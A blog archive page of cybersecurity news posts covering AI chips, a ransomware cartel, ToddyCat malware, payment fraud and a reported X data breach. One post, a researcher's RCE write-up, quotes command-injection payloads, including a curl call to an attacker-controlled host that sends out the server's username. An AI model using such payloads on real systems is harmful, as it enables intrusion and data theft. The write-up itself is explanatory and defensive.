Search This Blog

Powered by Blogger.

Blog Archive

Labels

About Me

Showing posts with label trending news. Show all posts

Cerebras Unveils World’s Fastest AI Chip, Beating Nvidia in Inference Speed

 

In a move that could redefine AI infrastructure, Cerebras Systems showcased its record-breaking Wafer Scale Engine (WSE) chip at Web Summit Vancouver, claiming it now holds the title of the world’s fastest AI inference engine. 

Roughly the size of a dinner plate, the latest WSE chip spans 8.5 inches (22 cm) per side and packs an astonishing 4 trillion transistors — a monumental leap from traditional processors like Intel’s Core i9 (33.5 billion transistors) or Apple’s M2 Max (67 billion). 

The result? A groundbreaking 2,500 tokens per second on Meta’s Llama 4 model, nearly 2.5 times faster than Nvidia’s recently announced benchmark of 1,000 tokens per second. “Inference is where speed matters the most,” said Naor Penso, Chief Information Security Officer at Cerebras. “Last week Nvidia hit 1,000 tokens per second — which is impressive — but today, we’ve surpassed that with 2,500 tokens per second.” 

Inference refers to how AI processes information to generate outputs like text, images, or decisions. Tokens, which can be words or characters, represent the basic units AI uses to interpret and respond. As AI agents take on more complex, multi-step tasks, inference speed becomes increasingly essential. “Agents need to break large tasks into dozens of sub-tasks and communicate between them quickly,” Penso explained. “Slow inference disrupts that entire flow.” 

What sets Cerebras apart isn’t just transistor count — it’s the chip’s design. Unlike Nvidia GPUs that require off-chip memory access, WSE integrates 44GB of high-speed RAM directly on-chip, ensuring ultra-fast data access and reduced latency. Independent benchmarks back Cerebras’ claims. 

Artificial Analysis, a third-party testing agency, confirmed the WSE achieved 2,522 tokens per second on Llama 4, outperforming Nvidia’s new Blackwell GPU (1,038 tokens/sec). “Cerebras is the only inference solution that currently outpaces Blackwell for Meta’s flagship model,” said Artificial Analysis CEO Micah Hill-Smith. 

While CPUs and GPUs have driven AI advancements for decades, Cerebras’ WSE represents a shift toward a new compute paradigm. “This isn’t x86 or ARM, It’s a new architecture designed to supercharge AI workloads,” said Julie Shin, Chief Marketing Officer at Cerebras.

AI Adoption Accelerates Despite Growing Security Concerns: Report

 

Businesses worldwide are rapidly embracing artificial intelligence (AI), yet a significant number remain deeply concerned about its security implications, according to the 2025 Thales Data Threat Report. Drawing insights from over 3,100 IT and cybersecurity professionals across 20 countries and 15 industries, the report identifies the rapid evolution of AI, particularly generative AI (GenAI) as the most pressing security threat for nearly 70% of surveyed organisations. Despite recognising AI as a major driver of innovation, many respondents expressed alarm over its risks to data integrity and trust. 

Specifically, 64% highlighted concerns over AI's lack of integrity, while 57% flagged trustworthiness as a key issue. The reliance of GenAI tools on user-provided data for tasks such as training and inference further amplifies the risk of sensitive data exposure. Even with these concerns, the pace of AI adoption continues to rise. The report found that one in three organisations is actively integrating GenAI into their operations, often before implementing sufficient security measures. Spending on GenAI tools has now become the second-highest priority for organisations, trailing only cloud security investments. 

 
“The fast-evolving GenAI landscape is pressuring enterprises to move quickly, sometimes at the cost of caution, as they race to stay ahead of the adoption curve,” said Eric Hanselman, Chief Analyst at S&P Global Market Intelligence 451 Research. 

“Many enterprises are deploying GenAI faster than they can fully understand their application architectures, compounded by the rapid spread of SaaS tools embedding GenAI capabilities, adding layers of complexity and risk.” 

In response to these emerging risks, 73% of IT professionals reported allocating budgets either new or existing towards AI-specific security solutions. While enthusiasm for GenAI continues to surge, the Thales report serves as a warning that rushing ahead without securing systems could expose organisations to serious vulnerabilities.

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that the behind of every cyberattack is a human being and the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.” 

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing the group’s leader “Oleg" formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs. 

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend. Client-Side Regex: A False Sense of Security The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question. 

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities. Bypassing Protections via Alternate HTTP Methods The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency. 

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.  
Architectural Oversight and Security Best Practices This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit. 

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 

Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.

DragonForce Unveils Cartel-Style Ransomware Model to Attract Affiliates

The ransomware landscape is seeing a shift as DragonForce, a known threat actor, introduces a new business model designed to bring various ransomware groups under a single, cartel-like umbrella. This initiative is aimed at simplifying operations for affiliates while expanding DragonForce’s reach in the cybercrime ecosystem. 

Traditionally, ransomware-as-a-service (RaaS) operations involve developers supplying the malicious tools and infrastructure, while affiliates carry out attacks and manage ransom negotiations. In exchange, developers typically receive up to 30% of the ransom collected. DragonForce’s updated model deviates from this approach by functioning more like a platform-as-a-service, offering its tools and infrastructure for a smaller cut—just 20%. 

Under this new setup, affiliates are allowed to create and operate under their own ransomware brand, all while utilizing DragonForce’s backend systems. These include data storage for exfiltrated files, tools for ransom negotiations, and malware deployment systems. This white-label model allows groups to appear as independent operations while relying on DragonForce’s infrastructure. 

A spokesperson for DragonForce told BleepingComputer that the group operates with clear rules and standards, which all affiliates are expected to follow. Any violations, they say, result in immediate removal from the network. Though these rules aren’t publicly disclosed, the group claims to maintain control since all services run on its servers. 

Interestingly, DragonForce claims it avoids certain targets in the healthcare sector, specifically facilities treating cancer and heart conditions. The group insists its motives are purely financial and not intended to harm vulnerable individuals. Cybersecurity analysts at Secureworks have noted that this new structure could appeal to both inexperienced and seasoned attackers. 

The simplified access to powerful ransomware tools, without the burden of managing infrastructure, lowers the barrier to entry and could lead to a broader adoption among cybercriminals. DragonForce has indicated its platform is open to unlimited affiliate brands capable of targeting a range of systems, including ESXi, NAS, BSD, and Windows environments. 

While the number of affiliates joining the network remains undisclosed, the group claims to have received interest from several prominent ransomware outfits. One such group, RansomBay, is already reported to be participating in the model. As this cartel-style operation gains traction, it could signal a new phase in ransomware operations—where brand diversity masks a centralised, shared infrastructure designed for profit and scalability.

ToddyCat Hackers Exploit ESET Vulnerability to Deploy Stealth Malware TCESB

 

A cyber-espionage group known as ToddyCat, believed to have ties to China, has been observed exploiting a security flaw in ESET’s software to deliver a new and previously undocumented malware strain called TCESB, according to fresh findings by cybersecurity firm Kaspersky. The flaw, tracked as CVE-2024-11859, existed in ESET’s Command Line Scanner. 

It improperly prioritized the current working directory when searching for the Windows system file “version.dll,” making it possible for attackers to substitute a malicious version of the file and gain control of the software’s behavior through a method known as DLL Search Order Hijacking. 

ESET has since released security updates in January 2025 to correct the issue, noting that attackers would still require administrative privileges to take advantage of the bug.  
Kaspersky’s research linked this technique to ToddyCat activity discovered in early 2024, where the suspicious “version.dll” file was planted in temporary directories on compromised systems. TCESB, the malware delivered via this method, had not been linked to the group before. It is engineered to evade monitoring tools and security defenses by executing payloads discreetly. 

TCESB is based on a modified version of the open-source tool EDRSandBlast, designed to tamper with low-level Windows kernel structures. It specifically targets mechanisms used by security solutions to track system events, effectively blinding them to malicious activity. To perform these actions, TCESB employs a Bring Your Own Vulnerable Driver (BYOVD) tactic, installing an outdated Dell driver (DBUtilDrv2.sys) that contains a known vulnerability (CVE-2021-36276). 

This method grants the malware elevated access to the system, enabling it to bypass protections and alter kernel processes. Similar drivers have been misused in the past, notably by other threat actors like the North Korea-linked Lazarus Group. Once the vulnerable driver is active, TCESB runs a loop that monitors for a payload file with a specific name. 

When the file appears, it is decrypted using AES-128 encryption and executed immediately. However, the payloads themselves were not recovered during analysis. Security analysts recommend that organizations remain vigilant by tracking the installation of drivers with known weaknesses and watching for kernel-level activity that shouldn’t typically occur, especially in environments not configured for debugging. The discovery further highlights ToddyCat’s ability to adapt and refine its tools. 

The group has been active since at least 2020, frequently targeting entities in the Asia-Pacific region with long-term, data-driven attacks.

Payment Fraud on the Rise: How Businesses Are Fighting Back with AI

The threat of payment fraud is growing rapidly, fueled by the widespread use of digital transactions and evolving cyber tactics. At its core, payment fraud refers to the unauthorized use of someone’s financial information to make illicit transactions. Criminals are increasingly leveraging hardware tools like skimmers and keystroke loggers, as well as malware, to extract sensitive data during legitimate transactions. 

As a result, companies are under mounting pressure to adopt more advanced fraud prevention systems. Credit and debit card fraud continue to dominate fraud cases globally. A recent report by Nilson found that global losses due to payment card fraud reached $33.83 billion in 2023, with nearly half of these losses affecting U.S. cardholders. 

While chip-enabled cards have reduced in-person fraud, online or card-not-present (CNP) fraud has surged. Debit card fraud often results in immediate financial damage to the victim, given its direct link to bank accounts. Meanwhile, mobile payments are vulnerable to tactics like SIM swapping and mobile malware, allowing attackers to hijack user accounts. 

Other methods include wire fraud, identity theft, chargeback fraud, and even check fraud—which, despite a decline in paper check usage, remains a threat through forged or altered checks. In one recent case, customers manipulated ATM systems to deposit fake checks and withdraw funds before detection, resulting in substantial bank losses. Additionally, criminals have turned to synthetic identity creation and AI-generated impersonations to carry out sophisticated schemes.  

However, artificial intelligence is not just a tool for fraudsters—it’s also a powerful ally for defense. Financial institutions are integrating AI into their fraud detection systems. Platforms like Visa Advanced Authorization and Mastercard Decision Intelligence use real-time analytics and machine learning to assess transaction risk and flag suspicious behavior. 

AI-driven firms such as Signifyd and Riskified help businesses prevent fraud by analyzing user behavior, transaction patterns, and device data. The consequences of payment fraud extend beyond financial loss. Businesses also suffer reputational harm, resource strain, and operational disruptions. 

With nearly 60% of companies reporting fraud-related losses exceeding $5 million in 2024, preventive action is crucial. From employee training and risk assessments to AI-powered tools and multi-layered security, organizations are now investing in proactive strategies to protect themselves and their customers from the rising tide of digital fraud.

Massive Data Breach Hits Elon Musk's X Platform

 

A potentially massive data breach has reportedly compromised Elon Musk’s social media platform X, previously known as Twitter, raising significant privacy concerns for millions of users. Cybersecurity researchers from SafetyDetectives discovered a troubling post over the weekend on BreachForums, a popular site frequented by hackers. A user known as "ThinkingOne" shared a large 34 GB CSV file containing data on more than 201 million accounts. The leaked information includes metadata and private email addresses that are usually kept confidential. 

SafetyDetectives verified a sample of the data, confirming that the exposed email addresses were authentic and active. While the exact source of the breach is still unclear, experts emphasize that the size and scope of the data exposure is unprecedented. According to ThinkingOne, this recent leak represents just a small portion of a larger breach that allegedly occurred earlier this year, potentially impacting up to 2.8 billion accounts. 

This bigger dataset, reported to be around 400 GB, has not yet been publicly released, and X has not acknowledged any knowledge of such a significant breach. Although the leaked dataset's size surpasses X's estimated active user base of about 400 million globally, as reported by Statista, it may include inactive or spam accounts and bots. 

Nonetheless, the leaked details, such as account creation dates, geographical information, tweet history, and display name history, are clearly linked to genuine user profiles. What raises the greatest concern is ThinkingOne's claim of merging this latest 2025 leak with email addresses obtained from a previous breach in 2023. 

The resulting dataset reportedly contains information on 201 million active users, significantly amplifying the risk of targeted phishing attacks and other malicious online activities. X, which was recently acquired by Musk’s artificial intelligence company xAI, has not yet publicly commented on the reported breach. The platform's silence amidst such a significant security issue has intensified user concerns about transparency and accountability regarding their privacy and security.